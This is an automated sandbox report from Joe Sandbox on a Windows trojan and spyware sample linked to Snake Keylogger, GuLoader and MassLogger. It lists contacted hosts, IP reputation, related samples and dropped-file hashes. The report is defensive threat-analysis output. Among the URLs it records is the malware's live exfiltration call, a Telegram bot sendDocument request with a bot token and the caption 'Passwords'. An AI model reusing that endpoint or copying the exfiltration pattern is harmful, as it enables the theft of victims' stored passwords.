            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.206.46
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.225
              truefalse
                high
                reallyfreegeoip.org
                104.21.112.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comczHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/iQczHx16QwGQ.exe, 00000005.00000002.2747096433.0000000038C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.google.com/QwpczHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgczHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botczHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://translate.google.com/translate_a/element.jsczHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.usercontent.google.com/BczHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000003.2308354318.0000000005C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://reallyfreegeoip.orgczHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036238000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.orgczHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.org/YQczHx16QwGQ.exe, 00000005.00000002.2747096433.0000000038C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.usercontent.google.com/czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000003.2308354318.0000000005C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.orgczHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://apis.google.comczHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.comczHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://nsis.sf.net/NSIS_ErrorErrorczHx16QwGQ.exefalse
                                                                high
                                                                http://api.telegram.orgczHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameczHx16QwGQ.exe, 00000005.00000002.2745533594.00000000361A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      104.21.112.1
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.181.225
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      193.122.6.168
                                                                      checkip.dyndns.comUnited States
                                                                      31898ORACLE-BMC-31898USfalse
                                                                      216.58.206.46
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1588292
                                                                      Start date and time:2025-01-10 23:36:27 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 42s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:8
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:czHx16QwGQ.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:84b2e764db4bcdad20e5b5455c35a59e9382d29c77ee3ce50940de23691a85a8.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 95%
                                                                      • Number of executed functions: 148
                                                                      • Number of non-executed functions: 109
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.109.210.53, 13.107.246.45
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      17:38:59API Interceptor297x Sleep call for process: czHx16QwGQ.exe modified
                                                                      23:37:17Task SchedulerRun new task: {6F4CAC57-95F3-46BD-9051-BA66312A823F} path:
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.2206cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          104.21.112.19MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.buyspeechst.shop/qzi3/
                                                                                          QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                          • www.buyspeechst.shop/w98i/
                                                                                          wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                          • beammp.com/phpmyadmin/
                                                                                          193.122.6.168Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          checkip.dyndns.comDdj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 132.226.247.73
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 132.226.8.169
                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 132.226.8.169
                                                                                          reallyfreegeoip.org6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.32.1
                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.80.1
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.80.1
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.80.1
                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.48.1
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.32.1
                                                                                          api.telegram.org6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ORACLE-BMC-31898USPK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 193.122.6.168
                                                                                          4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 193.122.6.168
                                                                                          TELEGRAMRU6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUSDdj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.80.1
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.162.153
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.223.109
                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.32.1
                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.11.60
                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.80.1
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.80.1
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adDdj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.112.1
                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.112.1
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.112.1
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.112.1
                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.112.1
                                                                                          3b5074b1b5d032e5620f69f9f700ff0e6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          37f463bf4616ecd445d4a1937da06e19Setup.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 142.250.181.225
                                                                                          • 216.58.206.46
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dllrXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):484658
                                                                                                              Entropy (8bit):7.809711763657168
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                              MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                              SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                              SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                              SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):112291
                                                                                                              Entropy (8bit):1.249420131631438
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                              MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                              SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                              SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                              SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):362089
                                                                                                              Entropy (8bit):1.23992084267325
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                              MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                              SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                              SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
